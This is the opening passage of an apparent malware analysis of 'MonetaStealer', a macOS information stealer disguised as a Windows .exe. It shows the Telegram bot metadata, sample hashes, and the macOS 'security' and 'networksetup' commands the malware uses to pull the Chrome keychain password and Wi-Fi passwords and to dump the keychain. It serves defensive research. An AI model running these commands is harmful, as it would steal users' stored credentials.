Analyzing the MonetaStealer macOS Threat

{   "ok": true,   "result": {     "id": 8384579537,     "is_bot": true,     "first_name": "B746 Mac Collector",     "username": "b746_mac_collector_bot",     "can_join_groups": true,     "can_read_all_group_messages": false,     "supports_inline_queries": false,     "can_connect_to_business": false,     "has_main_web_app": false,     "has_topics_enabled": false   } }

4885adc9de7e91b74a3ac01187775459acf3e4e026ee2fa776b3419cf8dbaf00 - MachO Portfolio_Review.exe 1a5027adf99076470444c5ffdd83a4313ab1d21827700699d0ee6ab1337beb70 - Mach-O Portfolio_Review.exe

6f746388853178a3b4c2c91a6bd98438fb59e760caa273a8d6a4c03936498c39 - Portfolio_app.pyc (Mach-O)

A01e57611537699d85e9767023638dbd88a224075a866c17509dc17d7e5ddbde - Portfolio_app.pyc (Windows)

security find-generic-password -w -a "Chrome" networksetup -listpreferredwirelessnetworks en0 security find-generic-password -wa "{ssid}" 2>/dev/null security find-generic-password -l "{ssid}" -g 2>&1 | grep "password:" security dump-keychain 2>/dev/null | grep -i {keyword} | head -20

On January 6, 2026, security researchers at Iru discovered a suspicious Mach-O binary masquerading as a Windows .exe file. Investigation revealed the file is a PyInstaller-compiled